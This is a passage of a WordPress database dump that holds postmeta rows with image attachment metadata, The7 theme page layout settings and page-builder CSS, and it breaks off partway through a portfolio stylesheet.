(34338,4791,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:550;s:6:\"height\";i:367;s:4:\"file\";s:48:\"2023/06/828c1ce1-4aca-4e92-a1e0-3d71a816c9fc.jpg\";s:8:\"filesize\";i:44243;s:5:\"sizes\";a:3:{s:6:\"medium\";a:5:{s:4:\"file\";s:48:\"828c1ce1-4aca-4e92-a1e0-3d71a816c9fc-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:13142;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:48:\"828c1ce1-4aca-4e92-a1e0-3d71a816c9fc-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6049;}s:6:\"awb_sm\";a:5:{s:4:\"file\";s:48:\"828c1ce1-4aca-4e92-a1e0-3d71a816c9fc-500x334.jpg\";s:5:\"width\";i:500;s:6:\"height\";i:334;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:31848;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(34339,4793,'_wp_attached_file','2023/06/6c0414f1-abcc-46a4-8e17-e17eb60be7b5.jpg'),
(34340,4793,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1600;s:6:\"height\";i:1066;s:4:\"file\";s:48:\"2023/06/6c0414f1-abcc-46a4-8e17-e17eb60be7b5.jpg\";s:8:\"filesize\";i:207021;s:5:\"sizes\";a:8:{s:6:\"medium\";a:5:{s:4:\"file\";s:48:\"6c0414f1-abcc-46a4-8e17-e17eb60be7b5-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:17153;}s:5:\"large\";a:5:{s:4:\"file\";s:49:\"6c0414f1-abcc-46a4-8e17-e17eb60be7b5-1024x682.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:682;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:145625;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:48:\"6c0414f1-abcc-46a4-8e17-e17eb60be7b5-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7104;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:48:\"6c0414f1-abcc-46a4-8e17-e17eb60be7b5-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:89528;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:50:\"6c0414f1-abcc-46a4-8e17-e17eb60be7b5-1536x1023.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1023;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:273938;}s:6:\"awb_sm\";a:5:{s:4:\"file\";s:48:\"6c0414f1-abcc-46a4-8e17-e17eb60be7b5-500x333.jpg\";s:5:\"width\";i:500;s:6:\"height\";i:333;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:42894;}s:6:\"awb_md\";a:5:{s:4:\"file\";s:48:\"6c0414f1-abcc-46a4-8e17-e17eb60be7b5-800x533.jpg\";s:5:\"width\";i:800;s:6:\"height\";i:533;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:101393;}s:6:\"awb_lg\";a:5:{s:4:\"file\";s:49:\"6c0414f1-abcc-46a4-8e17-e17eb60be7b5-1280x853.jpg\";s:5:\"width\";i:1280;s:6:\"height\";i:853;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:206911;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(34341,4804,'_edit_lock','1691948086:4'),
(34350,4804,'_edit_last','1'),
(34351,4804,'_wpb_vc_js_status','false'),
(34352,4804,'_dt_sidebar_position','disabled'),
(34353,4804,'_dt_sidebar_widgetarea_id','sidebar_1'),
(34354,4804,'_dt_sidebar_hide_on_mobile','0'),
(34355,4804,'_dt_footer_show','1'),
(34356,4804,'_dt_footer_widgetarea_id','sidebar_2'),
(34357,4804,'_dt_footer_hide_on_mobile','0'),
(34358,4804,'_dt_header_title','fancy'),
(34359,4804,'_dt_header_background','normal'),
(34360,4804,'_dt_header_background_below_slideshow','disabled'),
(34361,4804,'_dt_header_transparent_bg_color_scheme','light'),
(34362,4804,'_dt_header_transparent_top_bar_bg_color','#ffffff'),
(34363,4804,'_dt_header_transparent_top_bar_bg_opacity','25'),
(34364,4804,'_dt_header_transparent_bg_color','#000000'),
(34365,4804,'_dt_header_transparent_bg_opacity','50'),
(34366,4804,'_dt_header_disabled_background','normal'),
(34367,4804,'_dt_header_disabled_transparent_bg_color_scheme','light'),
(34368,4804,'_dt_header_disabled_transparent_top_bar_bg_color','#ffffff'),
(34369,4804,'_dt_header_disabled_transparent_top_bar_bg_opacity','25'),
(34370,4804,'_dt_header_disabled_transparent_bg_color','#000000'),
(34371,4804,'_dt_header_disabled_transparent_bg_opacity','50'),
(34372,4804,'_dt_page_overrides_top_margin',''),
(34373,4804,'_dt_page_overrides_right_margin',''),
(34374,4804,'_dt_page_overrides_bottom_margin',''),
(34375,4804,'_dt_page_overrides_left_margin',''),
(34376,4804,'_dt_mobile_page_padding_top',''),
(34377,4804,'_dt_mobile_page_padding_right',''),
(34378,4804,'_dt_mobile_page_padding_bottom',''),
(34379,4804,'_dt_mobile_page_padding_left',''),
(34380,4804,'_dt_fancy_header_layout_heading',''),
(34381,4804,'_dt_fancy_header_title_aligment','center'),
(34382,4804,'_dt_fancy_header_height','300'),
(34383,4804,'_dt_fancy_header_padding-top','0px'),
(34384,4804,'_dt_fancy_header_padding-bottom','0px'),
(34385,4804,'_dt_fancy_header_breadcrumbs_heading',''),
(34386,4804,'_dt_fancy_header_breadcrumbs','disabled'),
(34387,4804,'_dt_fancy_header_breadcrumbs_text_color','#ffffff'),
(34388,4804,'_dt_fancy_header_breadcrumbs_bg_color','disabled'),
(34389,4804,'_dt_fancy_header_title_heading',''),
(34390,4804,'_dt_fancy_header_title_mode','generic'),
(34391,4804,'_dt_fancy_header_title',''),
(34392,4804,'_dt_fancy_header_title_font_size','30'),
(34393,4804,'_dt_fancy_header_title_line_height','36'),
(34394,4804,'_dt_fancy_header_text_transform','none'),
(34395,4804,'_dt_fancy_header_title_color_mode','color'),
(34396,4804,'_dt_fancy_header_title_color','#ffffff'),
(34397,4804,'_dt_fancy_header_subtitle_heading',''),
(34398,4804,'_dt_fancy_header_subtitle',''),
(34399,4804,'_dt_fancy_header_subtitle_font_size','18'),
(34400,4804,'_dt_fancy_header_subtitle_line_height','26'),
(34401,4804,'_dt_fancy_header_subtitle_text_transform','none'),
(34402,4804,'_dt_fancy_header_subtitle_color_mode','color'),
(34403,4804,'_dt_fancy_header_subtitle_color','#ffffff'),
(34404,4804,'_dt_fancy_header_bg_heading',''),
(34405,4804,'_dt_fancy_header_bg_color','#222222'),
(34406,4804,'_dt_fancy_header_bg_image_origin','custom'),
(34407,4804,'_dt_fancy_header_bg_image','a:0:{}'),
(34408,4804,'_dt_fancy_header_bg_repeat','no-repeat'),
(34409,4804,'_dt_fancy_header_bg_position_x','center'),
(34410,4804,'_dt_fancy_header_bg_position_y','center'),
(34411,4804,'_dt_fancy_header_bg_fullscreen','1'),
(34412,4804,'_dt_fancy_header_bg_overlay','0'),
(34413,4804,'_dt_fancy_header_overlay_color','#000'),
(34414,4804,'_dt_fancy_header_bg_overlay_opacity','50'),
(34415,4804,'_dt_fancy_header_scroll_effect','default'),
(34416,4804,'_dt_fancy_header_bg_parallax','0.5'),
(34417,4804,'_dt_fancy_header_responsiveness_heading',''),
(34418,4804,'_dt_fancy_header_responsiveness','disabled'),
(34419,4804,'_dt_fancy_header_responsiveness_switch','778px'),
(34420,4804,'_dt_fancy_header_responsive_height','70'),
(34421,4804,'_dt_fancy_header_responsive_font_size','30'),
(34422,4804,'_dt_fancy_header_responsive_title_line_height','38'),
(34423,4804,'_dt_fancy_header_responsive_subtitle_font_size','20'),
(34424,4804,'_dt_fancy_header_responsive_subtitle_line_height','28'),
(34425,4804,'_dt_fancy_header_responsive_breadcrumbs','disabled'),
(34426,4804,'the7_fancy_title_css','.fancy-header {\n  background-image: none;\n  background-repeat: no-repeat;\n  background-position: center center;\n  background-size: cover;\n  background-color: #222222;\n}\n.mobile-false .fancy-header {\n  background-attachment: scroll;\n}\n.fancy-header .wf-wrap {\n  min-height: 300px;\n  padding-top: 0px;\n  padding-bottom: 0px;\n}\n.fancy-header .fancy-title {\n  font-size: 30px;\n  line-height: 36px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .fancy-subtitle {\n  font-size: 18px;\n  line-height: 26px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .breadcrumbs {\n  color: #ffffff;\n}\n.fancy-header-overlay {\n  background: rgba(0,0,0,0.5);\n}\n@media screen and (max-width: 778px) {\n  .fancy-header .wf-wrap {\n    min-height: 70px;\n  }\n  .fancy-header .fancy-title {\n    font-size: 30px;\n    line-height: 38px;\n  }\n  .fancy-header .fancy-subtitle {\n    font-size: 20px;\n    line-height: 28px;\n  }\n  .fancy-header.breadcrumbs-mobile-off .breadcrumbs {\n    display: none;\n  }\n  #fancy-header > .wf-wrap {\n    flex-flow: column wrap;\n    align-items: center;\n    justify-content: center;\n    padding-bottom: 0px !important;\n  }\n  .fancy-header.title-left .breadcrumbs {\n    text-align: center;\n    float: none;\n  }\n  .breadcrumbs {\n    margin-bottom: 10px;\n  }\n  .breadcrumbs.breadcrumbs-bg {\n    margin-top: 10px;\n  }\n  .fancy-header.title-right .breadcrumbs {\n    margin: 10px 0 10px 0;\n  }\n  #fancy-header .hgroup,\n  #fancy-header .breadcrumbs {\n    text-align: center;\n  }\n  .fancy-header .hgroup {\n    padding-bottom: 5px;\n  }\n  .breadcrumbs-off .hgroup {\n    padding-bottom: 5px;\n  }\n  .title-right .hgroup {\n    padding: 0 0 5px 0;\n  }\n  .title-right.breadcrumbs-off .hgroup {\n    padding-top: 5px;\n  }\n  .title-left.disabled-bg .breadcrumbs {\n    margin-bottom: 0;\n  }\n}\n'),
(34427,2082,'_wp_old_date','2023-06-23'),
(34428,2083,'_wp_old_date','2023-06-23'),
(34429,2346,'_wp_old_date','2023-06-23'),
(34430,2348,'_wp_old_date','2023-06-23'),
(34431,2349,'_wp_old_date','2023-06-23'),
(34432,2350,'_wp_old_date','2023-06-23'),
(34433,2351,'_wp_old_date','2023-06-23'),
(34434,2904,'_wp_old_date','2023-06-23'),
(34435,3556,'_wp_old_date','2023-06-23'),
(34436,2084,'_wp_old_date','2023-06-23'),
(34437,2352,'_wp_old_date','2023-06-23'),
(34438,2281,'_wp_old_date','2023-06-23'),
(34439,2353,'_wp_old_date','2023-06-23'),
(34440,2354,'_wp_old_date','2023-06-23'),
(34441,2355,'_wp_old_date','2023-06-23'),
(34442,2282,'_wp_old_date','2023-06-23'),
(34443,2283,'_wp_old_date','2023-06-23'),
(34444,3671,'_wp_old_date','2023-06-23'),
(34445,3645,'_wp_old_date','2023-06-23'),
(34446,2284,'_wp_old_date','2023-06-23'),
(34447,2921,'_wp_old_date','2023-06-23'),
(34448,2285,'_wp_old_date','2023-06-23'),
(34449,2356,'_wp_old_date','2023-06-23'),
(34450,2357,'_wp_old_date','2023-06-23'),
(34451,2359,'_wp_old_date','2023-06-23'),
(34452,2358,'_wp_old_date','2023-06-23'),
(34453,2286,'_wp_old_date','2023-06-23'),
(34454,4814,'_wpb_shortcodes_custom_css','.vc_custom_1529515723794{padding-top: 70px !important;padding-bottom: 55px !important;}.vc_custom_1529568771974{padding-top: 100px !important;padding-bottom: 105px !important;}.vc_custom_1665815238858{padding-top: 40px !important;padding-bottom: 40px !important;}.vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}'),
(34455,4815,'_wpb_shortcodes_custom_css','.vc_custom_1529515723794{padding-top: 70px !important;padding-bottom: 55px !important;}.vc_custom_1529568771974{padding-top: 100px !important;padding-bottom: 105px !important;}.vc_custom_1665815238858{padding-top: 40px !important;padding-bottom: 40px !important;}.vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}'),
(34456,4816,'_wpb_shortcodes_custom_css','.vc_custom_1680403823446{margin-top: -35px !important;}.vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}.vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}.vc_custom_1680403783341{margin-top: -15px !important;}.vc_custom_1680403868499{margin-top: -35px !important;}.vc_custom_1680403868499{margin-top: -35px !important;}.vc_custom_1680403868499{margin-top: -35px !important;}.vc_custom_1687571540500{margin-top: 50px !important;}.vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1687219449581{margin-top: 100px !important;}.vc_custom_1687219262706{margin-top: 100px !important;}.vc_custom_1687219711400{margin-top: 90px !important;}.vc_custom_1687096263968{margin-top: 0px !important;}.vc_custom_1687096091997{margin-top: 125px !important;}.vc_custom_1687096010128{margin-top: 50px !important;}.vc_custom_1687095942758{margin-top: 137px !important;}.vc_custom_1687219836213{margin-top: -px !important;}.vc_custom_1684305185157{margin-top: 40px !important;}.vc_custom_1687095881067{margin-top: 20px !important;}.vc_custom_1686345447550{margin-top: 50px !important;}.vc_custom_1686345389553{margin-top: 50px !important;}.vc_custom_1686345510625{margin-top: 50px !important;}.vc_custom_1687096291206{margin-top: 50px !important;}.vc_custom_1687096367037{margin-top: 50px !important;}.vc_custom_1687096532104{margin-top: 88px !important;}.vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1675475943417{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}.vc_custom_1684377464605{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}.vc_custom_1685736118080{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1686350035719{margin-top: 190px !important;}.vc_custom_1687564704480{margin-top: -4px !important;margin-left: -50px !important;border-left-width: -50px !important;}.vc_custom_1687564731927{margin-top: 8px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}.vc_custom_1687553105001{margin-top: 0px !important;}.vc_custom_1684378842229{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1687391423079{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1687570749968{margin-top: 12px !important;border-top-width: 0px !important;padding-top: 0px !important;}.vc_custom_1668204929553{margin-top: 20px !important;}.vc_custom_1687570624975{margin-top: 140px !important;}.vc_custom_1687570128641{margin-top: -70px !important;}.vc_custom_1687570507588{margin-top: 50px !important;}.vc_custom_1687570551843{margin-top: 50px !important;}.vc_custom_1686320668385{margin-top: -25px !important;}.vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}'),
(34457,4818,'_wpb_shortcodes_custom_css','.vc_custom_1680403823446{margin-top: -35px !important;}.vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}.vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}.vc_custom_1680403783341{margin-top: -15px !important;}.vc_custom_1680403868499{margin-top: -35px !important;}.vc_custom_1680403868499{margin-top: -35px !important;}.vc_custom_1680403868499{margin-top: -35px !important;}.vc_custom_1687571540500{margin-top: 50px !important;}.vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1687219449581{margin-top: 100px !important;}.vc_custom_1687219262706{margin-top: 100px !important;}.vc_custom_1687219711400{margin-top: 90px !important;}.vc_custom_1687096263968{margin-top: 0px !important;}.vc_custom_1687096091997{margin-top: 125px !important;}.vc_custom_1687096010128{margin-top: 50px !important;}.vc_custom_1687095942758{margin-top: 137px !important;}.vc_custom_1687219836213{margin-top: -px !important;}.vc_custom_1684305185157{margin-top: 40px !important;}.vc_custom_1687095881067{margin-top: 20px !important;}.vc_custom_1686345447550{margin-top: 50px !important;}.vc_custom_1686345389553{margin-top: 50px !important;}.vc_custom_1686345510625{margin-top: 50px !important;}.vc_custom_1687096291206{margin-top: 50px !important;}.vc_custom_1687096367037{margin-top: 50px !important;}.vc_custom_1687096532104{margin-top: 88px !important;}.vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1675475943417{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}.vc_custom_1684377464605{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}.vc_custom_1685736118080{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1686350035719{margin-top: 190px !important;}.vc_custom_1687564704480{margin-top: -4px !important;margin-left: -50px !important;border-left-width: -50px !important;}.vc_custom_1687564731927{margin-top: 8px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}.vc_custom_1687553105001{margin-top: 0px !important;}.vc_custom_1684378842229{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1687391423079{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1687570749968{margin-top: 12px !important;border-top-width: 0px !important;padding-top: 0px !important;}.vc_custom_1668204929553{margin-top: 20px !important;}.vc_custom_1687570624975{margin-top: 140px !important;}.vc_custom_1687570128641{margin-top: -70px !important;}.vc_custom_1687570507588{margin-top: 50px !important;}.vc_custom_1687570551843{margin-top: 50px !important;}.vc_custom_1686320668385{margin-top: -25px !important;}.vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}'),
(34459,2346,'_wp_old_date','2023-06-24'),
(34460,2349,'_wp_old_date','2023-06-24'),
(34461,2350,'_wp_old_date','2023-06-24'),
(34465,2359,'_wp_old_date','2023-06-24'),
(34469,2082,'_wp_old_date','2023-06-24'),
(34470,2351,'_wp_old_date','2023-06-24'),
(34471,2084,'_wp_old_date','2023-06-24'),
(34472,2281,'_wp_old_date','2023-06-24'),
(34473,2284,'_wp_old_date','2023-06-24'),
(34474,2285,'_wp_old_date','2023-06-24'),
(34479,4833,'_wp_attached_file','2023/06/IMG-20230623-WA0046.jpg'),
(34480,4833,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1600;s:6:\"height\";i:1066;s:4:\"file\";s:31:\"2023/06/IMG-20230623-WA0046.jpg\";s:8:\"filesize\";i:207021;s:5:\"sizes\";a:8:{s:6:\"medium\";a:5:{s:4:\"file\";s:31:\"IMG-20230623-WA0046-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:17153;}s:5:\"large\";a:5:{s:4:\"file\";s:32:\"IMG-20230623-WA0046-1024x682.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:682;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:145625;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:31:\"IMG-20230623-WA0046-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7104;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:31:\"IMG-20230623-WA0046-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:89528;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:33:\"IMG-20230623-WA0046-1536x1023.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1023;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:273938;}s:6:\"awb_sm\";a:5:{s:4:\"file\";s:31:\"IMG-20230623-WA0046-500x333.jpg\";s:5:\"width\";i:500;s:6:\"height\";i:333;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:42894;}s:6:\"awb_md\";a:5:{s:4:\"file\";s:31:\"IMG-20230623-WA0046-800x533.jpg\";s:5:\"width\";i:800;s:6:\"height\";i:533;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:101393;}s:6:\"awb_lg\";a:5:{s:4:\"file\";s:32:\"IMG-20230623-WA0046-1280x853.jpg\";s:5:\"width\";i:1280;s:6:\"height\";i:853;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:206911;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(34487,4849,'_wp_page_template','default'),
(34488,4849,'_wpb_vc_js_status','false'),
(34489,4849,'_dt_sidebar_position','disabled'),
(34490,4849,'_dt_sidebar_widgetarea_id','sidebar_1'),
(34491,4849,'_dt_sidebar_hide_on_mobile','0'),
(34492,4849,'_dt_footer_show','1'),
(34493,4849,'_dt_footer_widgetarea_id','sidebar_2'),
(34494,4849,'_dt_footer_hide_on_mobile','0'),
(34495,4849,'_dt_header_title','enabled'),
(34496,4849,'_dt_header_background','normal'),
(34497,4849,'_dt_header_background_below_slideshow','disabled'),
(34498,4849,'_dt_header_transparent_bg_color','#000000'),
(34499,4849,'_dt_header_transparent_bg_opacity','50'),
(34500,4849,'_dt_header_transparent_bg_color_scheme','light'),
(34501,4849,'_dt_header_disabled_background','normal'),
(34502,4849,'_dt_header_disabled_transparent_bg_color','#000000'),
(34503,4849,'_dt_header_disabled_transparent_bg_opacity','50'),
(34504,4849,'_dt_header_disabled_transparent_bg_color_scheme','light'),
(34505,4849,'_dt_header_transparent_top_bar_bg_color',''),
(34506,4849,'_dt_header_transparent_top_bar_bg_opacity','0'),
(34507,4849,'_dt_header_disabled_transparent_top_bar_bg_color',''),
(34508,4849,'_dt_header_disabled_transparent_top_bar_bg_opacity','0'),
(34509,4849,'_dt_page_overrides_top_margin',''),
(34510,4849,'_dt_page_overrides_bottom_margin',''),
(34511,4849,'the7_shortcodes_inline_css','.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.content-bg-on.classic-layout-list article {\r\n  background: #f7f7f7;\r\n  -webkit-box-shadow: none;\r\n  box-shadow: none;\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.dividers-on.classic-layout-list article {\r\n  margin-top: ;\r\n  padding-top: 0;\r\n  border-color: ;\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.dividers-on.classic-layout-list article:first-of-type {\r\n  margin-top: 0;\r\n  padding-top: 0;\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.classic-layout-list.mode-list .post-thumbnail-wrap {\r\n  width: ;\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.classic-layout-list.mode-list .post-entry-content {\r\n  width: calc(100% - );\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.classic-layout-list.mode-list .no-img .post-entry-content {\r\n  width: 100%;\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.bottom-overlap-layout-list .post-entry-content {\r\n  margin-top: -100px;\r\n  width: 75%;\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.bottom-overlap-layout-list:not(.mode-list) .no-img .post-entry-content {\r\n  margin-top: 0;\r\n  width: 100%;\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.bottom-overlap-layout-list.mode-list .no-img .post-entry-content {\r\n  margin-top: 0;\r\n}\r\n#page .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.content-bg-on.gradient-overlap-layout-list .post-entry-content {\r\n  background: linear-gradient(to bottom,#f7f7f7,#f7f7f7) no-repeat 0px 150px;\r\n}\r\n#page .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.content-bg-on.gradient-overlap-layout-list .post-entry-content:before {\r\n  background: #f7f7f7;\r\n  background: -moz-linear-gradient(top,rgba(247,247,247,0) 0%,rgba(247,247,247,0.9) 64%,#f7f7f7 83%,#f7f7f7 100%);\r\n  background: -webkit-linear-gradient(top,rgba(247,247,247,0) 0%,rgba(247,247,247,0.9) 64%,#f7f7f7 83%,#f7f7f7 100%);\r\n  background: linear-gradient(to bottom,rgba(247,247,247,0) 0%,rgba(247,247,247,0.9) 64%,#f7f7f7 83%,#f7f7f7 100%);\r\n}\r\n#page .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.content-bg-on.gradient-overlap-layout-list .no-img .post-entry-content {\r\n  background: #f7f7f7;\r\n  padding: 30px 30px 30px 30px;\r\n}\r\n#page .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.content-bg-on.gradient-overlap-layout-list .no-img .post-entry-content:before {\r\n  display: none;\r\n}\r\n#page .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.gradient-overlay-layout-list .post-entry-content {\r\n  background: #f7f7f7;\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.gradient-overlay-layout-list:not(.portfolio-shortcode):not(.albums-shortcode) .post-entry-content {\r\n  top: 20px;\r\n  right: 20px;\r\n  bottom: 20px;\r\n  left: 20px;\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.gradient-overlay-layout-list .post-head-wrapper,\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.gradient-overlay-layout-list .post-entry-wrapper {\r\n  right: 30px;\r\n  left: 30px;\r\n}\r\n#page .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.content-rollover-layout-list .post-entry-content {\r\n  background: none;\r\n  padding: 0;\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.content-rollover-layout-list .post-entry-content:before {\r\n  background: #f7f7f7;\r\n  background: -moz-linear-gradient(top,rgba(247,247,247,0) 0%,#f7f7f7 65%,#f7f7f7 100%);\r\n  background: -webkit-linear-gradient(top,rgba(247,247,247,0) 0%,#f7f7f7 65%,#f7f7f7 100%);\r\n  background: linear-gradient(to bottom,rgba(247,247,247,0) 0%,#f7f7f7 65%,#f7f7f7 100%);\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.content-rollover-layout-list .post-entry-wrapper {\r\n  padding: 20px 30px 30px 